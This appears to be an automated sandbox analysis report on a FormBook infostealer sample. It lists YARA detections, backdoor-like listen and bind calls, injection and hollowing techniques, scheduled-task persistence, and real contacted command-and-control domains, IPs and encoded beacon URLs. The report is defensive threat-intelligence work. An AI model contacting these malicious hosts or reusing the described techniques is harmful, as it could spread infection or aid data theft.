Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A01D6 GetUserNameW, 0_2_058A01D6
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A0A8E listen, 0_2_058A0A8E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A0E9E bind, 0_2_058A0E9E
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A0A50 listen, 0_2_058A0A50
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 0_2_058A0E6B bind, 0_2_058A0E6B
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 403903 Sample: 08917506_by_Libranalysis Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 41 www.arpinaindustriesllc.com 2->41 43 arpinaindustriesllc.com 2->43 51 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 10 other signatures 2->57 11 08917506_by_Libranalysis.exe 9 2->11         started        signatures3 process4 file5 33 C:\Users\user\AppData\Roaming\OfCxSfBf.exe, PE32 11->33 dropped 35 C:\Users\...\OfCxSfBf.exe:Zone.Identifier, ASCII 11->35 dropped 37 C:\Users\user\AppData\Local\...\tmpFA9B.tmp, XML 11->37 dropped 39 C:\Users\...\08917506_by_Libranalysis.exe.log, ASCII 11->39 dropped 71 Uses schtasks.exe or at.exe to add and modify task schedules 11->71 73 Tries to detect virtualization through RDTSC time measurements 11->73 75 Injects a PE file into a foreign processes 11->75 15 08917506_by_Libranalysis.exe 11->15         started        18 schtasks.exe 1 11->18         started        signatures6 process7 signatures8 77 Modifies the context of a thread in another process (thread injection) 15->77 79 Maps a DLL or memory area into another process 15->79 81 Sample uses process hollowing technique 15->81 83 Queues an APC in another process (thread injection) 15->83 20 explorer.exe 15->20 injected 24 conhost.exe 18->24         started        process9 dnsIp10 45 genialnetero.com 162.241.62.33, 49727, 80 UNIFIEDLAYER-AS-1US United States 20->45 47 firstcoastelope.com 67.222.39.83, 49734, 80 UNIFIEDLAYER-AS-1US United States 20->47 49 16 other IPs or domains 20->49 59 System process connects to network (likely due to code injection or exploit) 20->59 61 Performs DNS queries to domains with low reputation 20->61 63 Uses ipconfig to lookup or modify the Windows network settings 20->63 26 ipconfig.exe 20->26         started        signatures11 process12 signatures13 65 Modifies the context of a thread in another process (thread injection) 26->65 67 Maps a DLL or memory area into another process 26->67 69 Tries to detect virtualization through RDTSC time measurements 26->69 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.231.69.84
 www.joycasino-2020.club Ukraine
204601 ON-LINE-DATAServerlocation-NetherlandsDrontenNL true
192.0.78.24
 sherylabrahamphotography.com United States
2635 AUTOMATTICUS true
206.189.46.186
 www.thaihuay88.com United States
14061 DIGITALOCEAN-ASNUS true
199.192.27.68
 www.cinmax.xyz United States
22612 NAMECHEAP-NETUS true
162.241.62.33
 genialnetero.com United States
46606 UNIFIEDLAYER-AS-1US true
198.54.115.5
 website-bazar.com United States
22612 NAMECHEAP-NETUS true
23.227.38.74
 shops.myshopify.com Canada
13335 CLOUDFLARENETUS true
34.102.136.180
 blueberry-intl.com United States
15169 GOOGLEUS false
67.222.39.83
 firstcoastelope.com United States
46606 UNIFIEDLAYER-AS-1US true

Contacted Domains

Name IP Active
www.joycasino-2020.club 185.231.69.84 true
genialnetero.com 162.241.62.33 true
firstcoastelope.com 67.222.39.83 true
arpinaindustriesllc.com 162.0.232.119 true
www.cinmax.xyz 199.192.27.68 true
blueberry-intl.com 34.102.136.180 true
shops.myshopify.com 23.227.38.74 true
sherylabrahamphotography.com 192.0.78.24 true
www.thaihuay88.com 206.189.46.186 true
website-bazar.com 198.54.115.5 true
www.morumi.site unknown unknown
www.firstcoastelope.com unknown unknown
www.sherylabrahamphotography.com unknown unknown
www.recruit-japan-hcm.com unknown unknown
www.arpinaindustriesllc.com unknown unknown
www.genialnetero.com unknown unknown
www.evrbrite.com unknown unknown
www.website-bazar.com unknown unknown
www.marielivet.com unknown unknown
www.blueberry-intl.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.thaihuay88.com/o86d/?W6jDfD=Zr1mHD0UzvWCQcI2JlGAeokzkFEIblHMxqeZtw3W9dCQQ7exnTCb8lR/2qgknbIFYyB/eFrcFw==&Yn=ybdHh8KP02GTtb true
  • Avira URL Cloud: safe
 unknown
http://www.marielivet.com/o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb true
  • Avira URL Cloud: safe
 unknown
http://www.firstcoastelope.com/o86d/?W6jDfD=LOco70LpFY5umcR4dQY6Ck5isx6bsPxuRuPfG/JQuVwPWdFiKckkP6tLRm3hZqsbjizE9R3VWg==&Yn=ybdHh8KP02GTtb true
  • Avira URL Cloud: safe
 unknown
http://www.cinmax.xyz/o86d/?W6jDfD=FLq1m09lMNVeUGxb2EGlpEcYOBglVjP6VclDGdRBVwR1mwk4Bp+oxJyzVgRWjmk7leVMWGvpeQ==&Yn=ybdHh8KP02GTtb true
  • Avira URL Cloud: safe
 unknown
http://www.joycasino-2020.club/o86d/?W6jDfD=sTrQNZETbqohgMY0G3QDWOyfMZqAyHA57kuO1l/GbTBT7+5tNjLfMqbR0u4OJ3a+5b59BonIRA==&Yn=ybdHh8KP02GTtb true
  • Avira URL Cloud: safe
 unknown
http://www.website-bazar.com/o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k+L08OvZwr0NYVY1MAp4q6WCjDapjCg57Vf4Q==&Yn=ybdHh8KP02GTtb true
  • Avira URL Cloud: safe
 unknown
http://www.genialnetero.com/o86d/?W6jDfD=ciPSY9IHIiBMUeM+AHa6rnkVhX0NcoOlsc17DR+fEw9UxF+XyC1njkrt1st9cFa0q3XsiD0AOg==&Yn=ybdHh8KP02GTtb true
  • Avira URL Cloud: safe
 unknown
www.evrbrite.com/o86d/ true
  • Avira URL Cloud: safe
 low
http://www.blueberry-intl.com/o86d/?W6jDfD=lH+NNz2eaU5LSk/yemMXIWDwl3fMAuCKISb0DcDmH6anXfUVh7p155egYD4l1a4C4v8/cW+zhg==&Yn=ybdHh8KP02GTtb false
  • Avira URL Cloud: safe
 unknown
http://www.sherylabrahamphotography.com/o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4HvmT9bEqgnu31MbrCbNdKakV5eJA==&Yn=ybdHh8KP02GTtb true
  • Avira URL Cloud: safe
 unknown